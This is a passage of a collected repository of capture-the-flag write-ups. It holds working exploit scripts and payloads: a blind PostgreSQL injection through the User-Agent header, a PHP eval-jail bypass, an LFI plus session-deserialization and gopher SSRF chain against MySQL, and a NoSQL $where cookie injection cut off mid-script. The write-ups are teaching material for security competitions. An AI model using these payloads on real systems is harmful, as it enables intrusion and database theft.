73 |         I am a hacker, and this is my manifesto.  You may stop this individual,
74 | but you can't stop us all... after all, we're all alike.
75 | 
76 |                                


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/2.zip


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/3.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/3.zip


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/Alice.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/Alice.zip


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Trivia/README.md:
--------------------------------------------------------------------------------
 1 | # Trivia Flags
 2 | 
 3 | ~~~
 4 | Can you Name it? - Common Vulnerabilities and Exposures
 5 | Can you find it? (Bonus) - EternalBlue
 6 | Can you find it? - CVE-2017-0144
 7 | Can you use it? - exploit/windows/smb/ms17_010_eternalblue
 8 | I love tools - Developer Tools
 9 | Yummy... - cookies
10 | What is it - exploit-db
11 | Can you search it? - 0xffffffffffd00010
12 | Who knew? - Windows Nt
13 | ~~~


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/challenge-screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/challenge-screenshot.png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/ranking-screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/ranking-screenshot.png


--------------------------------------------------------------------------------
/2018/Timisoara-CTF-2018-Final/README.md:
--------------------------------------------------------------------------------
  1 | # Timisoara CTF 2018 Final Web Write-ups
  2 | ~~~
  3 | second place in Timisoara CTF Final (NextLine)
  4 | 2018.06.09 - 2018.06.10
  5 | Written by Siwoo Mun (munsiwoo)
  6 | ~~~
  7 | 
  8 | ### SQL Sanity Check (100pts)
  9 | 
 10 | SQL Sanity Check is postgresql injection challenge.  
 11 | injection point is `User-Agent` header. (request)  
 12 |   
 13 | my blind sqli script ``exploit.py``
 14 | ```python
 15 | from requests import post
 16 | import string
 17 | # made by munsiwoo
 18 | 
 19 | def rot(argv) :
 20 | 	rot15_table = {
 21 | 		'a':'p', 'b':'q', 'c':'r', 'd':'s', 'e':'t', 'f':'u',
 22 | 		'g':'v', 'h':'w', 'i':'x', 'j':'y', 'k':'z', 'l':'a',
 23 | 		'm':'b', 'n':'c', 'o':'d', 'p':'e', 'q':'f', 'r':'g',
 24 | 		's':'h', 't':'i', 'u':'j', 'v':'k', 'w':'l', 'x':'m',
 25 | 		'y':'n', 'z':'o',
 26 | 		'A':'P', 'B':'Q', 'C':'R', 'D':'S', 'E':'T', 'F':'U',
 27 | 		'G':'V', 'H':'W', 'I':'X', 'J':'Y', 'K':'Z', 'L':'A',
 28 | 		'M':'B', 'N':'C', 'O':'D', 'P':'E', 'Q':'F', 'R':'G',
 29 | 		'S':'H', 'T':'I', 'U':'J', 'V':'K', 'W':'L', 'X':'M',
 30 | 		'Y':'N', 'Z':'O'
 31 | 	}
 32 | 	val = str()
 33 | 
 34 | 	for x in argv :
 35 | 		if(x in string.ascii_letters) :
 36 | 			val += rot15_table[x]
 37 | 		else :
 38 | 			val += x
 39 | 
 40 | 	return val
 41 | 
 42 | def main() :
 43 | 	uri = 'http://89.38.210.129:8093/login.php'
 44 | 	data = {'email': ''}
 45 | 	headers = {
 46 | 		'Content-Type': 'application/x-www-form-urlencoded',
 47 | 		'Cookie': 'PHPSESSID=4is785omsp8monrenoop16len7',
 48 | 		'User-Agent': ''
 49 | 	}
 50 | 
 51 | 	# public:fl4g_1337:flag
 52 | 	# payload  = "' or substr((select table_schema||':'||table_name||':'||column_name from "
 53 | 	# payload += "information_schema.columns where table_schema='public' limit 1), {}, 1)='{}"
 54 | 	# timctf{1mP0rt4nT_r34lly_l0nG_ex7ra_l0nG_Fl4G_f0R_h34D_Mas7eR}
 55 | 
 56 | 	payload  = "' or substr((select flag from fl4g_1337 limit 1), {}, 1)='{}"
 57 | 	query = (lambda x, y:payload.format(x,y))
 58 | 	strings = '{}:_' + string.ascii_letters + string.digits;
 59 | 	result = str()
 60 | 
 61 | 	for x in range(1, 100) :
 62 | 		for y in strings :
 63 | 			headers['User-Agent'] = rot(query(x, y))
 64 | 			response = post(uri, data=data, headers=headers).text
 65 | 
 66 | 			if(response.find("Welcome back!") != -1) :
 67 | 				result += y
 68 | 				break
 69 | 
 70 | 			if(y == '9') :
 71 | 				exit(0)
 72 | 
 73 | 		print(result)
 74 | 
 75 | if __name__ == '__main__' :
 76 | 	main()
 77 | 	
 78 | ```
 79 | 
 80 | a piece of cake =)  
 81 | 
 82 |   
 83 | 
 84 | ### PHP REvival (200pts)
 85 | 
 86 | PHP REvival is php zend engine opcode analyze challenge.  
 87 | reference : http://php.net/manual/kr/internals2.opcodes.php  
 88 | ```
 89 | function name:  (null)
 90 | compiled vars:  none
 91 | line     #* E I O op                           fetch          ext  return  operands
 92 | -------------------------------------------------------------------------------------
 93 |    3     0  E >   NOP
 94 |   14     1        INIT_FCALL                                               'getflag'
 95 |          2        FETCH_R                      global              $0      '_REQUEST'
 96 |          3        FETCH_DIM_R                                      $1      $0, 'g'
 97 |          4        SEND_VAR                                                 $1
 98 |          5        DO_FCALL                                      0  $2
 99 |          6        ECHO                                                     $2
100 |   21     7      > RETURN                                                   1
101 | 
102 | function name:  getFlag
103 | compiled vars:  !0 = $guess, !1 = $flag
104 | line     #* E I O op                           fetch          ext  return  operands
105 | -------------------------------------------------------------------------------------
106 |    3     0  E >   RECV                                             !0
107 |    4     1        ASSIGN                                                   !1, '*CENSORED_FLAG*'
108 |    6     2        STRLEN                                           ~3      !0
109 |          3        IS_NOT_IDENTICAL                                 ~4      ~3, 8
110 |          4      > JMPZ                                                     ~4, ->6
111 |          5    > > RETURN                                                   null
112 | 
113 |    7     6    >   FETCH_DIM_R                                      $5      !0, 3
114 |          7        FETCH_DIM_R                                      $6      !0, 5
115 |          8        IS_NOT_IDENTICAL                                 ~7      $5, $6
116 |          9      > JMPZ_EX                                          ~7      ~7, ->14
117 |         10    >   FETCH_DIM_R                                      $8      !0, 5
118 |         11        FETCH_DIM_R                                      $9      !0, 7
119 |         12        IS_NOT_EQUAL                                     ~10     $8, $9
120 |         13        BOOL                                             ~7      ~10
121 |         14    > > JMPZ_EX                                          ~7      ~7, ->20
122 |         15    >   FETCH_DIM_R                                      $11     !0, 0
123 |         16        FETCH_DIM_R                                      $12     !0, 1
124 |         17        MUL                                              ~13     $11, $12
125 |         18        IS_NOT_IDENTICAL                                 ~14     ~13, 30
126 |         19        BOOL                                             ~7      ~14
127 |         20    > > JMPZ                                                     ~7, ->22
128 |         21    > > RETURN                                                   null
129 | 
130 |    8    22    >   FETCH_DIM_R                                      $15     !0, 1
131 |         23        FETCH_DIM_R                                      $16     !0, 2
132 |         24        FETCH_DIM_R                                      $17     !0, 6
133 |         25        ADD                                              ~18     $16, $17
134 |         26        IS_NOT_EQUAL                                     ~19     $15, ~18
135 |         27      > JMPZ_EX                                          ~19     ~19, ->34
136 |         28    >   FETCH_DIM_R                                      $20     !0, 3
137 |         29        FETCH_DIM_R                                      $21     !0, 0
138 |         30        FETCH_DIM_R                                      $22     !0, 2
139 |         31        ADD                                              ~23     $21, $22
140 |         32        IS_NOT_EQUAL                                     ~24     $20, ~23
141 |         33        BOOL                                             ~19     ~24
142 |         34    > > JMPZ                                                     ~19, ->36
143 |         35    > > RETURN                                                   null
144 |         
145 |    9    36    >   INIT_FCALL                                               'md5'
146 |         37        CONCAT                                           ~25     'a', !0
147 |         38        CONCAT                                           ~26     ~25, 'a'
148 |         39        SEND_VAL                                                 ~26
149 |         40        DO_ICALL                                         $27
150 |         41        IS_NOT_EQUAL                                     ~28     $27, 0
151 |         42      > JMPZ                                                     ~28, ->44
152 |         43    > > RETURN                                                   null
153 |   11    44    > > RETURN                                                   !1
154 |   12    45*     > RETURN                                                   null
155 | End of function getflag
156 | ```
157 | to
158 | ```php
159 | <?php
160 | echo getFlag($_REQUEST['g']);
161 | 
162 | function getflag($guess, $flag='*CENSORED_FLAG*'){
163 | 	if(strlen($guess) !== 8) return null;
164 | 
165 | 	if($guess[3] !== $guess[5] &&
166 | 	   $guess[5] != $guess[7] &&
167 | 	   $guess[0] * $guess[1] !== 30) return null;
168 | 	   
169 | 	if($guess[1] != $guess[2] + $guess[6] &&
170 | 	   $guess[3] != $guess[0] + $guess[2]) return null;
171 | 
172 | 	if(md5('a' + $guess + 'a') != 0) return $flag;
173 | }
174 | ```
175 | my payload : ``http://89.38.210.129:8091/?g=56123455``
176 | 
177 | ### YAPS (100pts) - First blood
178 | YAPS is PHP Jail.  
179 | flag is in the flag.php  
180 | ```php
181 | <?php
182 | 
183 | $k = $_REQUEST['k'];
184 | // just one simple trick.. now all hackers hate him
185 | if (preg_match("/[\w]{3,}/is", $k) || preg_match("/\.|\"|'|\[/s", $k) || strlen($k) > 100) die('nope');
186 | 
187 | eval($k);
188 | 
189 | highlight_file(__FILE__);
190 | ```
191 | my payload : ``http://89.38.210.129:8095/?k=$a=_G;$a{2}=E;$a{3}=T;${$a}{b}(${$a}{c});&b=highlight_file&c=flag.php``  
192 |   
193 | a piece of cake =)  
194 |   
195 | ### YAPS2 (350pts)
196 | YAPS2 is open_basedir and disable_functions bypass challenge.  
197 | 


--------------------------------------------------------------------------------
/2019/19Cyberoc/19Cyberoc - Secret Service (Hidden Service) Write up.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2019/19Cyberoc/19Cyberoc - Secret Service (Hidden Service) Write up.pdf


--------------------------------------------------------------------------------
/2019/19Cyberoc/README.md:
--------------------------------------------------------------------------------
  1 | ## 19Cyberoc - Secret Service (Hidden Service)
  2 | 
  3 | ```
  4 | Uneducated people (Junior 1st)
  5 | 
  6 | Cyberoc19 (2019 Whitehat Contest) - Secret Service Write up
  7 | Written by munsiwoo (mun.xiwoo@gmail.com)
  8 | ```
  9 | 
 10 | 
 11 | 
 12 | ### Source leak (LFI + PHP Wrapper)
 13 | 
 14 | 문제에서는 `index.php`의 소스 일부를 제공한다. 해당 소스를 보면 간단한 미티게이션을 우회하고 `LFI`가 가능하다. `LFI`를 `PHP Wrapper`와 연계해서 `index.php`, `config.php`, `helper.php`, `dbconn.php` 등 다양한 소스를 얻을 수 있었다. (미티게이션 우회는 정규식 필터링이 미흡하므로 `php://`에서 `php`대신 `PHP`를 사용하면 된다.)
 15 | 
 16 | ```php
 17 | SimpleRouter::post("/intra/view", function() {
 18 |     $service = input("service", false, "post");
 19 |     if($service === false)
 20 |         return "No such service";
 21 | 
 22 |     chdir("intra");
 23 |     $service = str_replace("_", "/", $service);
 24 |     if(strpos($service, '/') === 0 || preg_match("/^.*(\\.\\.|php).*$/", $service))
 25 |         return "Don't cheat!";
 26 |     
 27 |     include $service.".php";
 28 |     chdir("..");
 29 | }); 
 30 | ```
 31 | 
 32 | ```
 33 | service=PHP://filter/convert.base64-encode/resource=index
 34 | ```
 35 | 
 36 | 
 37 | 
 38 | ### Attack scenario
 39 | 
 40 | 1\. `dbconn.php`에는 MySQL 연결 정보가 담겨있는데, 패스워드 부분이 비어있는걸 볼 수 있다.
 41 | 여기서 "`SSRF`를 통해 `gopher://`를 사용하면 직접 DB에 접근할 수 있겠다." 라고 생각했다.
 42 | 
 43 | 2\. `config.php`을 보면 `ReportModule`, `LogModule` 이렇게 2개의 클래스가 정의되어 있다.
 44 | `ReportModule`의 `send_real` 메소드에서는 `SSRF`가 가능해보였다.
 45 | 
 46 | ```php
 47 | # ReportModule Class
 48 | public function send_report() {
 49 |     return $this->send_real();
 50 | }
 51 | private function send_real() {
 52 |     $target_host = parse_url($this->target, PHP_URL_HOST);
 53 |     if($target_host !== "localhost")
 54 |         return "Report can only be sent to localhost";
 55 |     
 56 |     $curl= curl_init();
 57 |     curl_setopt($curl, CURLOPT_URL, $this->target);
 58 |     $res = curl_exec($curl);
 59 |     curl_close($curl);
 60 | 
 61 |     return $res;
 62 | }
 63 | ```
 64 | 
 65 | 3\. 단 `ReportModule`을 사용하려면 `LogModule`의 특정 메소드(set_rpt_module)를 호출해야 했고, 해당 메소드를 직접적으로 호출하는 코드는 없었다. 따라서 unserialize함수나 phar:// 등을 사용해 `Object Injection`을 해야겠다고 생각했다.
 66 | 
 67 | ```php
 68 | # LogModule Class
 69 | public function set_rpt_module($custom_module) {
 70 |     if(!method_exists($custom_module, "send_report"))
 71 |         return false;
 72 |     $this->rpt_module = $custom_module;
 73 |     return true;
 74 | }
 75 | public function __destruct() {
 76 |     if($this->rpt_module == null || !method_exists($this->rpt_module, "send_report"))
 77 |         return;
 78 | 
 79 |     $log_string = "REPORT_LOG";
 80 |     $this->write_line($log_string." - ".$this->rpt_module->send_report());
 81 | }
 82 | ```
 83 | 
 84 | 4\. unserialize 함수를 사용하거나 phar://을 사용할 부분은 딱히 보이지 않았다. 도중 `config.php`에 상단에 있는 ini_set과, `/info`로 접속하면 보여주는 phpinfo 페이지를 보니 세션에 원하는 데이터를 넣고 세션을 역직렬화하는 과정에서 `Object Injection`이 가능해 보였다. (자세한 설명은 아래에서)
 85 | 
 86 | 
 87 | 
 88 | ### PHP session.upload_progress option
 89 | 
 90 | PHP는 업로드 중인 개별 파일의 업로드 진행률을 추적할 수 있도록 `upload_progress` 옵션을 제공한다.
 91 | `session.upload_progress.enabled`, `session.upload_progress.cleanup` 이렇게 2개의 옵션은 기본적으로 `On`으로 설정되어 있는데 `session.upload_progress.enabled`가 활성화되어 있으면 `session_start()` 없이 세션을 생성할 수 있다. (업로드 진행률 추적을 위해 세션을 사용) 단,  `session.upload_progress.cleanup` 옵션이 `On`으로 활성화되어 있다면 진행률 추적에 쓰인 세션 파일은 자동으로 삭제된다.
 92 | 
 93 | 반대로  `session.upload_progress.cleanup` 가 `Off`라면  `session_start()` 없이 내가 원하는 값을 포함한 세션 파일을 생성하고 유지할 수 있다는 의미다.
 94 | 
 95 | ```
 96 | session.upload_progress.enabled = On
 97 | session.upload_progress.cleanup = Off
 98 | ```
 99 | 
100 | 문제 또한 위와 같이 설정되어 있었으므로 아래 요청으로 세션에 원하는 데이터를 넣을 수 있었다.
101 | 
102 | ```
103 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ
104 | Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
105 | 
106 | munsiwoo
107 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ
108 | Content-Disposition: form-data; name="file"; filename="abcd"
109 | Content-Type: text/plain
110 | 
111 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ--
112 | ```
113 | 
114 | 
115 | 
116 | ### PHP session.serialize_handler option
117 | 
118 | PHP에서 **session.serialize_handler** 옵션은 세션의 핸들러를 지정해주는 옵션이다.
119 | 어떤 방식으로 직렬화, 역직렬화 할지 설정할 수 있으며 기본값은 `php`다.
120 | `php` 말고도 `php_binary`, `php_serialize`, `wddx` 옵션이 있다.
121 | 
122 | ```
123 | Local Value : session.serialize_handler = php
124 | Master Value : session.serialize_handler = php_serialize
125 | ```
126 | 
127 | 문제는 위와 같이 `php.ini`에서는  `php_serialize`로 설정해놨고
128 | PHP 페이지에서는 `ini_set()`을 통해 `php`로 재설정했다.
129 | 즉, 세션을 직렬화해서 파일에 쓸 때와 읽어서 역직렬화 할 때 서로 다른 방식으로 진행할 수 있다는 것이다.
130 | 
131 | 
132 | 
133 | ### Proof of Concept
134 | 
135 | 우선 PHP에 `Object Injection`에 성공한다면 Code Execution이 가능하도록 클래스 하나를 만들어준다.
136 | 
137 | ```php
138 | class A {
139 |     public $cmd;
140 |     function __destruct() {
141 |         eval($this->cmd);
142 |     }
143 | }
144 | ```
145 | 
146 | 
147 | 또한 세션 파일에 내가 원하는 데이터를 포함시킬 수 있도록 `php.ini`에서 다음과 같이 설정해준다.
148 | 
149 | ```
150 | session.upload_progress.enabled = On
151 | session.upload_progress.cleanup = Off
152 | ```
153 | 
154 | 위와 같이 설정되어 있을 때 아래 내용으로 `POST` 요청을 하면 세션 파일이 생성되는걸 볼 수 있다.
155 | 
156 | ```
157 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ
158 | Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
159 | 
160 | munsiwoo
161 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ
162 | Content-Disposition: form-data; name="file"; filename="|O:1:\\"A\\":1:{s:3:\\"cmd\\";s:10:\\"phpinfo();\\";}"
163 | Content-Type: text/plain
164 | 
165 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ--
166 | ```
167 | 
168 | #### session.serialize_handler에 따른 세션 값 차이
169 | 
170 | * Local Value, Master Value 둘다`php`일 때
171 | 
172 | ```
173 | upload_progress_abc|a:5:{s:10:"start_time";i:1568682523;s:14:"content_length";i:331;s:15:"bytes_processed";i:331;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:3:"abc";s:4:"name";s:41:"|O:1:"A":1:{s:3:"cmd";s:10:"phpinfo();";}";s:8:"tmp_name";s:14:"/tmp/phpHEOzEC";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1568682523;s:15:"bytes_processed";i:5;}}}
174 | ```
175 | 
176 | * Local Value, Master Value 둘다 `php_serialize`일 때
177 | 
178 | ```
179 | a:1:{s:19:"upload_progress_abc";a:5:{s:10:"start_time";i:1568682633;s:14:"content_length";i:331;s:15:"bytes_processed";i:331;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:3:"abc";s:4:"name";s:41:"|O:1:"A":1:{s:3:"cmd";s:10:"phpinfo();";}";s:8:"tmp_name";s:14:"/tmp/phpz5NId3";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1568682633;s:15:"bytes_processed";i:5;}}}}
180 | ```
181 | 
182 | 우선 위 세션 데이터 모두 `session_start()`를 해도 `phpinfo()` 실행은 안 된다.
183 | 다만 `php_serialize`일 때 직렬화된 값에서 `ini_set()`로 **session.serialize_handler**을 `php`로 변경해주고 `session_start()`를 하면 정상적으로 `phpinfo()`가 실행되면서 세션 데이터는 아래로 바뀐다.
184 | 
185 | ```
186 | a:1:{s:19:"upload_progress_abc";a:5:{s:10:"start_time";i:1568682633;s:14:"content_length";i:331;s:15:"bytes_processed";i:331;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:3:"abc";s:4:"name";s:41:"|O:1:"A":1:{s:3:"cmd";s:10:"phpinfo();";}
187 | ```
188 | 
189 | ```php
190 | <?php
191 | ini_set('session.serialize_handler', 'php');
192 | 
193 | class A {
194 |     public $cmd;
195 |     function __destruct() {
196 |         eval($this->cmd);
197 |     }
198 | }
199 | 
200 | session_start();
201 | ```
202 | 
203 | 이유는 `php` 옵션은 `|` 파이프 문자로 세션 명과 세션 데이터를 구분하고 (`a|i:1234;`)
204 | `php_serialize` 옵션은 세션 명과 세션 데이터를 `array`로 구분한다. (`a:1:{s:1:"a";i:1234;}`)
205 | 
206 | ```
207 | a:1:{s:19:"upload_progress_abc";a:5:{s:10:"start_time";i:1568683023;s:14:"content_length";i:331;s:15:"bytes_processed";i:331;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:3:"abc";s:4:"name";s:41:"|O:1:"A":1:{s:3:"cmd";s:10:"phpinfo();";}
208 | ```
209 | 
210 | 위와 같이 `php_serialize` 방식으로 직렬화된 세션 데이터를 `php` 방식으로 역직렬화한다면
211 | 
212 | ```
213 | array(1) {
214 |   ["a:1:{s:19:"upload_progress_abc";a:5:{s:10:"start_time";i:1568683023;s:14:"content_length";i:331;s:15:"bytes_processed";i:331;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:3:"abc";s:4:"name";s:41:""]=>
215 |   object(__PHP_Incomplete_Class)#1 (2) {
216 |     ["__PHP_Incomplete_Class_Name"]=>
217 |     string(1) "A"
218 |     ["cmd"]=>
219 |     string(10) "phpinfo();"
220 |   }
221 | }
222 | ```
223 | 
224 | 이렇게 `|` 가 나오기 전까지는 세션명으로 인식하고 그 후는 세션 데이터로 인식하면서 성공적으로 `Object Injection`을 할 수 있게된다.
225 | 
226 | 
227 | 
228 | ### Exploit
229 | 
230 | ```php
231 | <?php
232 | error_reporting(0);
233 | # made by munsiwoo
234 | 
235 | class ReportModule { public $target; }
236 | class LogModule { public $filename, $rpt_module; }
237 | 
238 | $rpt_module = new ReportModule();
239 | $rpt_module->target = 'gopher://localhost:3306/_%a7%00%00%01%85%a2%1e%00%00%00%00%40%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%69%6e%74%72%61%5f%6d%61%6e%61%67%65%72%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%61%03%5f%6f%73%09%64%65%62%69%61%6e%36%2e%30%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%32%33%34%34%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%08%35%2e%36%2e%36%2d%6d%39%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%03%66%6f%6f%03%62%61%72%35%00%00%00%03%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%76%61%6c%75%65%29%20%66%72%6f%6d%20%69%6e%74%72%61%5f%64%61%74%61%2e%70%61%73%73%77%6f%72%64%3b%01%00%00%00%01';
240 | 
241 | $log_module = new LogModule();
242 | $log_module->filename = 'log/munsiwoo123';
243 | $log_module->rpt_module = $rpt_module;
244 | 
245 | echo '|'.str_replace('"', '\\\\"', serialize($log_module));
246 | 
247 | ```
248 | 
249 | `gopher://localhost:3306/_`뒤에 붙는 데이터는 MySQL 쿼리를 직접 요청할 수 있는 Raw data다. 위에서는 `select group_concat(value) from intra_data.password;` 를 요청하도록 생성했다.
250 | 
251 | PHP를 실행해서 나온 직렬화된 데이터를 filename에 담아서 세션 데이터에 포함시켜 세션을 생성한다.
252 | 
253 | ```python
254 | import requests as req
255 | # made by munsiwoo
256 | 
257 | contents = """------WebKitFormBoundaryUmsB8xWbmldnarAQ
258 | Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
259 | 
260 | munsiwoo
261 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ
262 | Content-Disposition: form-data; name="file"; filename="|O:9:\\"LogModule\\":2:{s:8:\\"filename\\";s:15:\\"log/munsiwoo123\\";s:10:\\"rpt_module\\";O:12:\\"ReportModule\\":1:{s:6:\\"target\\";s:724:\\"gopher://localhost:3306/_%a7%00%00%01%85%a2%1e%00%00%00%00%40%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%69%6e%74%72%61%5f%6d%61%6e%61%67%65%72%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%61%03%5f%6f%73%09%64%65%62%69%61%6e%36%2e%30%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%32%33%34%34%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%08%35%2e%36%2e%36%2d%6d%39%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%03%66%6f%6f%03%62%61%72%35%00%00%00%03%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%76%61%6c%75%65%29%20%66%72%6f%6d%20%69%6e%74%72%61%5f%64%61%74%61%2e%70%61%73%73%77%6f%72%64%3b%01%00%00%00%01\\";}}"
263 | Content-Type: text/plain
264 | 
265 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ--"""
266 | 
267 | if __name__ == '__main__' :
268 |     url = "http://13.209.230.31/admin"
269 | 
270 |     headers = {
271 |         "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryUmsB8xWbmldnarAQ",
272 |         "Cookie": "PHPSESSID=munsiwoo"
273 |     }
274 | 
275 |     req.post(url, headers=headers, data=contents)
276 |     result = req.get(url, headers=headers).text
277 | 
278 |     print(result, flush=True)
279 | ```
280 | 
281 | ![flag](flag.png)
282 | 
283 | 
284 | 
285 | ### Reference
286 | 
287 | [https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html](https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html "https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html")
288 | [http://wonderkun.cc/index.html/?p=718](http://wonderkun.cc/index.html/?p=718 "http://wonderkun.cc/index.html/?p=718")
289 | [https://blog.spoock.com/2016/10/16/php-serialize-problem/](https://blog.spoock.com/2016/10/16/php-serialize-problem/ "https://blog.spoock.com/2016/10/16/php-serialize-problem/")
290 | [https://gist.github.com/chtg/f74965bfea764d9c9698](https://gist.github.com/chtg/f74965bfea764d9c9698 "https://gist.github.com/chtg/f74965bfea764d9c9698")
291 | [https://www.zzfly.net/ctf-serialize/](https://www.zzfly.net/ctf-serialize/ "https://www.zzfly.net/ctf-serialize/")
292 | [https://bugs.php.net/bug.php?id=71101](https://bugs.php.net/bug.php?id=71101 "https://bugs.php.net/bug.php?id=71101")
293 | [https://bugs.php.net/bug.php?id=72681](https://bugs.php.net/bug.php?id=72681 "https://bugs.php.net/bug.php?id=72681")
294 | [https://www.php.net/manual/en/session.upload-progress.php](https://www.php.net/manual/en/session.upload-progress.php "https://www.php.net/manual/en/session.upload-progress.php")
295 | [https://www.php.net/manual/en/session.configuration.php#ini.session.serialize-handler](https://www.php.net/manual/en/session.configuration.php#ini.session.serialize-handler "https://www.php.net/manual/en/session.configuration.php#ini.session.serialize-handler")
296 | 


--------------------------------------------------------------------------------
/2019/19Cyberoc/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2019/19Cyberoc/flag.png


--------------------------------------------------------------------------------
/2020/Defenit_CTF/web1-fortune-cookie/exploit.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import threading
 3 | 
 4 | def overwrite_floor_func() :
 5 |     headers = {
 6 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
 7 |         "Accept-Encoding": "gzip, deflate",
 8 |         "Accept-Language": "ko,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,la;q=0.5,und;q=0.4,lb;q=0.3,vi;q=0.2",
 9 |         "Cache-Control": "no-cache",
10 |         "Connection": "keep-alive",
11 |         "Cookie": 'user=s%3Aj%3A%7B%22%24where%22%3A%22(Math.floor%3Dfunction()%7Breturn%206969%7D)%26%260%22%7D.IoORcQjJrlGyo1KJ2%2BFpUOvvcNwJ6bTB4J2n%2FuoLtEw',
12 |         "Host": "fortune-cookie.ctf.defenit.kr",
13 |         "Pragma": "no-cache",
14 |         "Referer": "http://fortune-cookie.ctf.defenit.kr/",
15 |         "Upgrade-Insecure-Requests": "1",
16 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
17 |     }
18 |     cookies = {"user": 's%3Aj%3A%7B%22%24where%22%3A%22(Math.floor%3Dfunction()%7Breturn%206969%7D)%26%260%22%7D.IoORcQjJrlGyo1KJ2%2BFpUOvvcNwJ6bTB4J2n%2FuoLtEw'}
19 |     print(requests.get("http://fortune-cookie.ctf.defenit.kr/posts", headers=headers, cookies=cookies))
20 | 
21 | def get_flag() :
22 |     headers = {
23 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
24 |         "Accept-Encoding": "gzip, deflate",
25 |         "Accept-Language": "ko,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,la;q=0.5,und;q=0.4,lb;q=0.3,vi;q=0.2",
26 |         "Cache-Control": "no-cache",
27 |         "Connection": "keep-alive",
28 |         "Cookie": "user=s%3Aj%3A%7B%22%24where%22%3A%22this.author%3D%3D%3D'zuuuzi'%22%7D.nmTSqk3He9NUQpTKov%2Bxivt9o%2F8fL6xG9e3LmSiJgfw",
29 |         "Host": "fortune-cookie.ctf.defenit.kr",
30 |         "Pragma": "no-cache",
31 |         "Referer": "http://fortune-cookie.ctf.defenit.kr/",
32 |         "Upgrade-Insecure-Requests": "1",
